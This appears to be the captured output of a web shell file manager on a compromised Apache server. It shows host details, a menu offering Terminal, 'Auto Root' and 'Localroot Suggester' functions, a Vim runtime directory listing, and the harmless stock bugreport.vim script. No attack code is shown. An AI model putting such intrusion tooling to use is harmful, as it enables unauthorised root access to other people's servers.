Linux jobworks 6.8.0-136-generic #136-Ubuntu SMP PREEMPT_DYNAMIC Wed Jul 1 21:53:05 UTC 2026 x86_64
Apache/2.4.58 (Ubuntu)
Server IP : 10.0.1.5 & Your IP : 216.73.217.52
Domains :
Cant Read [ /etc/named.conf ]
User : www-data
Terminal
Auto Root
Create File
Create Folder
Localroot Suggester
Backdoor Destroyer
Readme
/
usr /
share /
vim /
vim91 /
Delete
Unzip
Name
Size
Permission
Date
Action
autoload
[ DIR ]
drwxr-xr-x
2026-07-16 06:48
colors
[ DIR ]
drwxr-xr-x
2026-07-16 06:48
compiler
[ DIR ]
drwxr-xr-x
2026-07-16 06:48
doc
[ DIR ]
drwxr-xr-x
2026-07-16 06:48
ftplugin
[ DIR ]
drwxr-xr-x
2026-07-16 06:48
import
[ DIR ]
drwxr-xr-x
2025-08-05 17:14
indent
[ DIR ]
drwxr-xr-x
2026-07-16 06:48
keymap
[ DIR ]
drwxr-xr-x
2026-07-16 06:48
lang
[ DIR ]
drwxr-xr-x
2026-07-16 06:48
macros
[ DIR ]
drwxr-xr-x
2026-07-16 06:48
pack
[ DIR ]
drwxr-xr-x
2025-08-05 17:14
plugin
[ DIR ]
drwxr-xr-x
2026-07-16 06:48
print
[ DIR ]
drwxr-xr-x
2026-07-16 06:48
spell
[ DIR ]
drwxr-xr-x
2026-07-16 06:48
syntax
[ DIR ]
drwxr-xr-x
2026-07-16 06:48
tutor
[ DIR ]
drwxr-xr-x
2026-07-16 06:48
bugreport.vim
1.95
KB
-rw-r--r--
2026-07-13 17:17
debian.vim
1.76
KB
-rw-r--r--
2026-06-15 22:15
defaults.vim
4.74
KB
-rw-r--r--
2026-07-13 17:17
delmenu.vim
1.25
KB
-rw-r--r--
2026-07-13 17:17
evim.vim
2.23
KB
-rw-r--r--
2026-07-13 17:17
filetype.vim
76.64
KB
-rw-r--r--
2026-07-13 17:17
ftoff.vim
346
B
-rw-r--r--
2026-07-13 17:17
ftplugin.vim
1.17
KB
-rw-r--r--
2026-07-13 17:17
ftplugof.vim
419
B
-rw-r--r--
2026-07-13 17:17
gvimrc_example.vim
1.67
KB
-rw-r--r--
2026-07-13 17:17
indent.vim
820
B
-rw-r--r--
2026-07-13 17:17
indoff.vim
348
B
-rw-r--r--
2026-07-13 17:17
menu.vim
41.16
KB
-rw-r--r--
2026-07-13 17:17
mswin.vim
3.41
KB
-rw-r--r--
2026-07-13 17:17
optwin.vim
67.38
KB
-rw-r--r--
2026-07-13 17:17
scripts.vim
866
B
-rw-r--r--
2026-07-13 17:17
synmenu.vim
39.39
KB
-rw-r--r--
2026-07-13 17:17
vimrc_example.vim
1.4
KB
-rw-r--r--
2026-07-13 17:17
Save
Rename
:" Use this script to create the file "bugreport.txt", which contains :" information about the environment of a possible bug in Vim. :" :" Maintainer: The Vim Project <https://github.com/vim/vim> :" Last change: 2023 Aug 10 :" Former Maintainer: Bram Moolenaar <Bram@vim.org> :" :" To use inside Vim: :" :so $VIMRUNTIME/bugreport.vim :" Or, from the command line: :" vim -s $VIMRUNTIME/bugreport.vim :" :" The "if 1" lines are to avoid error messages when expression evaluation is :" not compiled in. :" :if 1 : let more_save = &more :endif :set nomore :if has("unix") : !echo "uname -a" >bugreport.txt : !uname -a >>bugreport.txt :endif :redir >>bugreport.txt :version :if 1 : func <SID>CheckDir(n) : if isdirectory(a:n) : echo 'directory "' . a:n . '" exists' : else : echo 'directory "' . a:n . '" does NOT exist' : endif : endfun : func <SID>CheckFile(n) : if filereadable(a:n) : echo '"' . a:n . '" is readable' : else : echo '"' . a:n . '" is NOT readable' : endif : endfun : echo "--- Directories and Files ---" : echo '$VIM = "' . $VIM . '"' : call <SID>CheckDir($VIM) : echo '$VIMRUNTIME = "' . $VIMRUNTIME . '"' : call <SID>CheckDir($VIMRUNTIME) : call <SID>CheckFile(&helpfile) : call <SID>CheckFile(fnamemodify(&helpfile, ":h") . "/tags") : call <SID>CheckFile($VIMRUNTIME . "/menu.vim") : call <SID>CheckFile($VIMRUNTIME . "/filetype.vim") : call <SID>CheckFile($VIMRUNTIME . "/syntax/synload.vim") : delfun <SID>CheckDir : delfun <SID>CheckFile : echo "--- Scripts sourced ---" : scriptnames :endif :set all :set termcap :au :if 1 : echo "--- Normal/Visual mode mappings ---" :endif :map :if 1 : echo "--- Insert/Command-line mode mappings ---" :endif :map! :if 1 : echo "--- Abbreviations ---" :endif :ab :if 1 : echo "--- Highlighting ---" :endif :highlight :if 1 : echo "--- Variables ---" :endif :if 1 : let :endif :redir END :set more& :if 1 : let &more = more_save : unlet more_save :endif :e bugreport.txt